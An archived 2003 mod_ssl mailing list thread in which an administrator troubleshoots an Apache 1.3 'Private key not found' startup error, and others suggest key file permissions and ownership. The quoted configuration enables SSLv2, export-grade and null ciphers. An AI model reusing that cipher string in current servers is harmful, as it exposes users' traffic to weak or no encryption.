Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 4669D2AA015
	for ; Thu,  6 Mar 2003 20:55:29 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id BC0D080E5B
	for ; Fri,  7 Mar 2003 16:20:31 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Fri, 7 Mar 2003 16:20:31 -0600
User-Agent: KMail/1.4.3
References: <200303071542.00371.aputnam@pelathe.org> <02db01c2e417$bc7462c0$9f05a8c0@rgedyew2k>
In-Reply-To: <02db01c2e417$bc7462c0$9f05a8c0@rgedyew2k>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303071620.31307.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

The permissions for the server.crt file are rw-r--r-- but it still cannot=
 find=20
the Private Key.

On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> Please check the permissions on your private key.  They should be reada=
ble
> only by owner (400)
>
> (knee-jerk first guess reaction)
>
> Best of luck
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Friday, March 07, 2003 3:42 PM
> Subject: private key not found
>
>
> I'm trying to get mod_ssl to work on my server, but each time I try to
> restart
> apache with mod_ssl activated, it gives me this error:
>
> /etc/init.d/apache start returned 7 (Program is not running.)
> Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> Phrase Dialog)
> Some of your private key files are encrypted for security reasons.
> In order to read them you have to provide us with the pass phrases.
>
> Server matrix.pelathe.org:443 (RSA)
> Enter pass phrase:
> Apache:mod_ssl:Error: Private key not found.
> **Stopped
> stty: standard input: Inappropriate ioctl for device
> ..failed
>
> What I don't understand is how it can't find the Private key. The
> SSLCertificateKeyFile path in httpd.conf matches the location of the ke=
y in
> my directory. Isn't the SSLCertificateKeyFile the Private Key path?
>
> I'm including the Virtual Host code (sans the explination text and a
> passkey).
> I'm very new to this so I won't be surprised if there is a glaring erro=
r in
> here that I missed...
>
> 
>
> DocumentRoot "/srv/www/htdocs"
> ServerName matrix.pelathe.org
> ServerAdmin tkitchen@pelathe.org
> ErrorLog /var/log/httpd/error_log
> TransferLog /var/log/httpd/access_log
>
> SSLEngine on
>
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>
> SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
>
> SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
>
> SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
>
> #SSLCACertificatePath /etc/httpd/ssl.crt
> SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
>
> SSLCARevocationPath /etc/httpd/ssl.crl
> #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
>
> SSLVerifyClient require
> SSLVerifyDepth  10
>
> #
> #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> #            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
> #            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       ) \
> #           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
> #
>
> #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequir=
e
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
>
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> CustomLog /var/log/httpd/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
> 
>
> Any help would be greatly appreciated. I'm using Apache 1.3.26 and Mod_=
SSL
> 2.8.10 on a SuSE 8.1 box.
>
> Thanks,
> -Andrew
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 21:07:33 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0E4B52AA020; Thu,  6 Mar 2003 21:07:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from matrix.pelathe.org (100.34.cm.sunflower.com [24.124.34.100])
	by master.modssl.org (Postfix) with ESMTP id 8ADDE2AA015
	for ; Thu,  6 Mar 2003 21:07:31 +0100 (CET)
Received: from matrix (matrix.pelathe.org [192.168.1.200])
	by matrix.pelathe.org (Postfix) with ESMTP id 61B4580E6F
	for ; Fri,  7 Mar 2003 16:32:34 -0600 (CST)
Content-Type: text/plain;
  charset="iso-8859-1"
From: "A. Putnam" 
Organization: Pelathe Comminuty Resource Center
To: modssl-users@modssl.org
Subject: Re: private key not found
Date: Fri, 7 Mar 2003 16:32:34 -0600
User-Agent: KMail/1.4.3
References: <200303071542.00371.aputnam@pelathe.org> <02db01c2e417$bc7462c0$9f05a8c0@rgedyew2k> <200303071620.31307.aputnam@pelathe.org>
In-Reply-To: <200303071620.31307.aputnam@pelathe.org>
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Message-Id: <200303071632.34349.aputnam@pelathe.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "A. Putnam" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Is it possible that root would need to be able to execute this file?

On Friday 07 March 2003 16:20, A. Putnam wrote:
> The permissions for the server.crt file are rw-r--r-- but it still cann=
ot
> find the Private Key.
>
> On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> > Please check the permissions on your private key.  They should be
> > readable only by owner (400)
> >
> > (knee-jerk first guess reaction)
> >
> > Best of luck
> >
> > ----- Original Message -----
> > From: "A. Putnam" 
> > To: 
> > Sent: Friday, March 07, 2003 3:42 PM
> > Subject: private key not found
> >
> >
> > I'm trying to get mod_ssl to work on my server, but each time I try t=
o
> > restart
> > apache with mod_ssl activated, it gives me this error:
> >
> > /etc/init.d/apache start returned 7 (Program is not running.)
> > Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> > Phrase Dialog)
> > Some of your private key files are encrypted for security reasons.
> > In order to read them you have to provide us with the pass phrases.
> >
> > Server matrix.pelathe.org:443 (RSA)
> > Enter pass phrase:
> > Apache:mod_ssl:Error: Private key not found.
> > **Stopped
> > stty: standard input: Inappropriate ioctl for device
> > ..failed
> >
> > What I don't understand is how it can't find the Private key. The
> > SSLCertificateKeyFile path in httpd.conf matches the location of the =
key
> > in my directory. Isn't the SSLCertificateKeyFile the Private Key path=
?
> >
> > I'm including the Virtual Host code (sans the explination text and a
> > passkey).
> > I'm very new to this so I won't be surprised if there is a glaring er=
ror
> > in here that I missed...
> >
> > 
> >
> > DocumentRoot "/srv/www/htdocs"
> > ServerName matrix.pelathe.org
> > ServerAdmin tkitchen@pelathe.org
> > ErrorLog /var/log/httpd/error_log
> > TransferLog /var/log/httpd/access_log
> >
> > SSLEngine on
> >
> > SSLCipherSuite
> > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> >
> > SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> > #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
> >
> > SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> > #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
> >
> > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> >
> > #SSLCACertificatePath /etc/httpd/ssl.crt
> > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> >
> > SSLCARevocationPath /etc/httpd/ssl.crl
> > #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
> >
> > SSLVerifyClient require
> > SSLVerifyDepth  10
> >
> > #
> > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > #            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
> > #            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       )=
 \
> > #           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
> > #
> >
> > #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequ=
ire
> > 
> >     SSLOptions +StdEnvVars
> > 
> > 
> >     SSLOptions +StdEnvVars
> > 
> >
> > SetEnvIf User-Agent ".*MSIE.*" \
> >          nokeepalive ssl-unclean-shutdown \
> >          downgrade-1.0 force-response-1.0
> >
> > CustomLog /var/log/httpd/ssl_request_log \
> >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> >
> > 
> >
> > Any help would be greatly appreciated. I'm using Apache 1.3.26 and
> > Mod_SSL 2.8.10 on a SuSE 8.1 box.
> >
> > Thanks,
> > -Andrew
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g
> >
> >
> > _____________________________________________________________________=
_
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.or=
g
> > User Support Mailing List                      modssl-users@modssl.or=
g
> > Automated List Manager                            majordomo@modssl.or=
g

--=20
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 21:14:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E12582AA020; Thu,  6 Mar 2003 21:14:25 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tfmx.com (user.teleformix.com [12.15.20.65])
	by master.modssl.org (Postfix) with ESMTP id 2F8FA2AA015
	for ; Thu,  6 Mar 2003 21:14:24 +0100 (CET)
Received: from rgedyew2k (rgedye-tfmx.tfmx.com [192.168.5.159])
	by mail.tfmx.com (8.9.3/8.9.3) with SMTP id OAA31468
	for ; Thu, 6 Mar 2003 14:14:18 -0600
Message-ID: <030501c2e41d$a1186430$9f05a8c0@rgedyew2k>
From: "Ron Gedye" 
To: 
References: <200303071542.00371.aputnam@pelathe.org> <02db01c2e417$bc7462c0$9f05a8c0@rgedyew2k> <200303071620.31307.aputnam@pelathe.org>
Subject: Re: private key not found
Date: Thu, 6 Mar 2003 14:19:02 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron Gedye" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

How did you generate the CSR to get the cert?  What key file did you use for
this?

The cert (crt) file perms look ok, (444 would be better) but who owns it?

does this file exist?
/etc/httpd/ssl.key/server.key (according to your conf)

if so, the permissions should be
-r-----

This file should be owned by root (in most all cases) and not the webserver
account (nobody/apache).

----- Original Message -----
From: "A. Putnam" 
To: 
Sent: Friday, March 07, 2003 4:20 PM
Subject: Re: private key not found


The permissions for the server.crt file are rw-r--r-- but it still cannot
find
the Private Key.

On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> Please check the permissions on your private key.  They should be readable
> only by owner (400)
>
> (knee-jerk first guess reaction)
>
> Best of luck
>
> ----- Original Message -----
> From: "A. Putnam" 
> To: 
> Sent: Friday, March 07, 2003 3:42 PM
> Subject: private key not found
>
>
> I'm trying to get mod_ssl to work on my server, but each time I try to
> restart
> apache with mod_ssl activated, it gives me this error:
>
> /etc/init.d/apache start returned 7 (Program is not running.)
> Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> Phrase Dialog)
> Some of your private key files are encrypted for security reasons.
> In order to read them you have to provide us with the pass phrases.
>
> Server matrix.pelathe.org:443 (RSA)
> Enter pass phrase:
> Apache:mod_ssl:Error: Private key not found.
> **Stopped
> stty: standard input: Inappropriate ioctl for device
> ..failed
>
> What I don't understand is how it can't find the Private key. The
> SSLCertificateKeyFile path in httpd.conf matches the location of the key
in
> my directory. Isn't the SSLCertificateKeyFile the Private Key path?
>
> I'm including the Virtual Host code (sans the explination text and a
> passkey).
> I'm very new to this so I won't be surprised if there is a glaring error
in
> here that I missed...
>
> 
>
> DocumentRoot "/srv/www/htdocs"
> ServerName matrix.pelathe.org
> ServerAdmin tkitchen@pelathe.org
> ErrorLog /var/log/httpd/error_log
> TransferLog /var/log/httpd/access_log
>
> SSLEngine on
>
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
>
> SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
>
> SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
>
> SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
>
> #SSLCACertificatePath /etc/httpd/ssl.crt
> SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
>
> SSLCARevocationPath /etc/httpd/ssl.crl
> #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
>
> SSLVerifyClient require
> SSLVerifyDepth  10
>
> #
> #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
> #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
> #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
> #
>
> #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
>
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>
> CustomLog /var/log/httpd/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>
> 
>
> Any help would be greatly appreciated. I'm using Apache 1.3.26 and Mod_SSL
> 2.8.10 on a SuSE 8.1 box.
>
> Thanks,
> -Andrew
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
A. Putnam
Assistant IT Administrator
Pelathe Community Resource Center

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 21:55:28 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 451312AA020; Thu,  6 Mar 2003 21:55:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from aples1.jhuapl.edu (aples1.jhuapl.edu [128.244.26.85])
	by master.modssl.org (Postfix) with ESMTP id 66E832AA015
	for ; Thu,  6 Mar 2003 21:55:26 +0100 (CET)
Received: by aples1.jhuapl.edu with Internet Mail Service (5.5.2653.19)
	id <1QHC5NX6>; Thu, 6 Mar 2003 15:54:48 -0500
Message-ID: 
From: "Yu, Ming" 
To: "'modssl-users@modssl.org'" 
Subject: Apache 2.0.44 with Openssl -0.9.7
Date: Thu, 6 Mar 2003 15:54:53 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yu, Ming" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Does anyone have problem with apache 2.0.44 and Openssl 0.9.7.
I installed the server, no problem.  Then I wanted to start the httpd
server, even without mod_ssl.  

./apachectl -k start

There is no message on the screen, but an error message in the log file.
The apache engine did not start.

[warn] Init: PRNG still contains insufficient entropy!
[error] Init: Failed to generate temporary 512 bit RSA private key
Configuration Failed

Any suggestions.

- Ming Yu
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 22:25:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CE3742AA020; Thu,  6 Mar 2003 22:25:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 2384B2AA015
	for ; Thu,  6 Mar 2003 22:25:48 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA06661;
	Thu, 6 Mar 2003 16:23:47 -0500
Date: Thu, 6 Mar 2003 16:23:46 -0500 (EST)
From: "R. DuFresne" 
To: "A. Putnam" 
Cc: modssl-users@modssl.org
Subject: Re: private key not found
In-Reply-To: <200303071620.31307.aputnam@pelathe.org>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, 7 Mar 2003, A. Putnam wrote:

> The permissions for the server.crt file are rw-r--r-- but it still cannot find 
> the Private Key.

which would be 644 rather then 400 as the first person responded.

> 
> On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> > Please check the permissions on your private key.  They should be readable
> > only by owner (400)
> >
> > (knee-jerk first guess reaction)
> >
> > Best of luck
> >
> > ----- Original Message -----
> > From: "A. Putnam" 
> > To: 
> > Sent: Friday, March 07, 2003 3:42 PM
> > Subject: private key not found
> >
> >
> > I'm trying to get mod_ssl to work on my server, but each time I try to
> > restart
> > apache with mod_ssl activated, it gives me this error:
> >
> > /etc/init.d/apache start returned 7 (Program is not running.)
> > Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> > Phrase Dialog)
> > Some of your private key files are encrypted for security reasons.
> > In order to read them you have to provide us with the pass phrases.
> >
> > Server matrix.pelathe.org:443 (RSA)
> > Enter pass phrase:
> > Apache:mod_ssl:Error: Private key not found.
> > **Stopped
> > stty: standard input: Inappropriate ioctl for device
> > ..failed
> >
> > What I don't understand is how it can't find the Private key. The
> > SSLCertificateKeyFile path in httpd.conf matches the location of the key in
> > my directory. Isn't the SSLCertificateKeyFile the Private Key path?
> >
> > I'm including the Virtual Host code (sans the explination text and a
> > passkey).
> > I'm very new to this so I won't be surprised if there is a glaring error in
> > here that I missed...
> >
> > 
> >
> > DocumentRoot "/srv/www/htdocs"
> > ServerName matrix.pelathe.org
> > ServerAdmin tkitchen@pelathe.org
> > ErrorLog /var/log/httpd/error_log
> > TransferLog /var/log/httpd/access_log
> >
> > SSLEngine on
> >
> > SSLCipherSuite
> > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> >
> > SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> > #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
> >
> > SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> > #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
> >
> > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> >
> > #SSLCACertificatePath /etc/httpd/ssl.crt
> > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> >
> > SSLCARevocationPath /etc/httpd/ssl.crl
> > #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
> >
> > SSLVerifyClient require
> > SSLVerifyDepth  10
> >
> > #
> > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> > #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> > #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
> > #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
> > #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
> > #
> >
> > #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire
> > 
> >     SSLOptions +StdEnvVars
> > 
> > 
> >     SSLOptions +StdEnvVars
> > 
> >
> > SetEnvIf User-Agent ".*MSIE.*" \
> >          nokeepalive ssl-unclean-shutdown \
> >          downgrade-1.0 force-response-1.0
> >
> > CustomLog /var/log/httpd/ssl_request_log \
> >           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> >
> > 
> >
> > Any help would be greatly appreciated. I'm using Apache 1.3.26 and Mod_SSL
> > 2.8.10 on a SuSE 8.1 box.
> >
> > Thanks,
> > -Andrew
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  6 22:41:16 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 713832AA020; Thu,  6 Mar 2003 22:41:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tfmx.com (user.teleformix.com [12.15.20.65])
	by master.modssl.org (Postfix) with ESMTP id B44872AA015
	for ; Thu,  6 Mar 2003 22:41:14 +0100 (CET)
Received: from rgedyew2k (rgedye-tfmx.tfmx.com [192.168.5.159])
	by mail.tfmx.com (8.9.3/8.9.3) with SMTP id PAA09174
	for ; Thu, 6 Mar 2003 15:41:09 -0600
Message-ID: <035b01c2e429$c274ecf0$9f05a8c0@rgedyew2k>
From: "Ron Gedye" 
To: 
References: 
Subject: Re: private key not found
Date: Thu, 6 Mar 2003 15:45:27 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ron Gedye" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

He lists the certificate, I'm speaking of the key.

Although this (URL) relates to unencypting (removing passphrase) of the key
(and ver 2.0) it is still relevant, and in some cases will prevent SSL (or
am I speaking of SSH?) the secure socket transport from properly
initializing. I know I've seen this other places in regards to apache, this
was just the first reference I could quickly find.

>From http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html

Make sure the server.key file is now only readable by root:

$ chmod 400 server.key


----- Original Message -----
From: "R. DuFresne" 
To: "A. Putnam" 
Cc: 
Sent: Thursday, March 06, 2003 3:23 PM
Subject: Re: private key not found


> On Fri, 7 Mar 2003, A. Putnam wrote:
>
> > The permissions for the server.crt file are rw-r--r-- but it still
cannot find
> > the Private Key.
>
> which would be 644 rather then 400 as the first person responded.
>
> >
> > On Thursday 06 March 2003 13:36, Ron Gedye wrote:
> > > Please check the permissions on your private key.  They should be
readable
> > > only by owner (400)
> > >
> > > (knee-jerk first guess reaction)
> > >
> > > Best of luck
> > >
> > > ----- Original Message -----
> > > From: "A. Putnam" 
> > > To: 
> > > Sent: Friday, March 07, 2003 3:42 PM
> > > Subject: private key not found
> > >
> > >
> > > I'm trying to get mod_ssl to work on my server, but each time I try to
> > > restart
> > > apache with mod_ssl activated, it gives me this error:
> > >
> > > /etc/init.d/apache start returned 7 (Program is not running.)
> > > Starting httpd [ Mailman PHP4 SSL ]Apache/1.3.26 mod_ssl/2.8.10 (Pass
> > > Phrase Dialog)
> > > Some of your private key files are encrypted for security reasons.
> > > In order to read them you have to provide us with the pass phrases.
> > >
> > > Server matrix.pelathe.org:443 (RSA)
> > > Enter pass phrase:
> > > Apache:mod_ssl:Error: Private key not found.
> > > **Stopped
> > > stty: standard input: Inappropriate ioctl for device
> > > ..failed
> > >
> > > What I don't understand is how it can't find the Private key. The
> > > SSLCertificateKeyFile path in httpd.conf matches the location of the
key in
> > > my directory. Isn't the SSLCertificateKeyFile the Private Key path?
> > >
> > > I'm including the Virtual Host code (sans the explination text and a
> > > passkey).
> > > I'm very new to this so I won't be surprised if there is a glaring
error in
> > > here that I missed...
> > >
> > > 
> > >
> > > DocumentRoot "/srv/www/htdocs"
> > > ServerName matrix.pelathe.org
> > > ServerAdmin tkitchen@pelathe.org
> > > ErrorLog /var/log/httpd/error_log
> > > TransferLog /var/log/httpd/access_log
> > >
> > > SSLEngine on
> > >
> > > SSLCipherSuite
> > > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> > >
> > > SSLCertificateFile /etc/httpd/ssl.crt/server.crt
> > > #SSLCertificateFile /etc/httpd/ssl.crt/server-dsa.crt
> > >
> > > SSLCertificateKeyFile /etc/httpd/ssl.key/server.key
> > > #SSLCertificateKeyFile /etc/httpd/ssl.key/server-dsa.key
> > >
> > > SSLCertificateChainFile /etc/httpd/ssl.crt/ca.crt
> > >
> > > #SSLCACertificatePath /etc/httpd/ssl.crt
> > > SSLCACertificateFile /etc/httpd/ssl.crt/ca-bundle.crt
> > >
> > > SSLCARevocationPath /etc/httpd/ssl.crl
> > > #SSLCARevocationFile /etc/httpd/ssl.crl/ca-bundle.crl
> > >
> > > SSLVerifyClient require
> > > SSLVerifyDepth  10
> > >
> > > #
> > > #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> > > #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
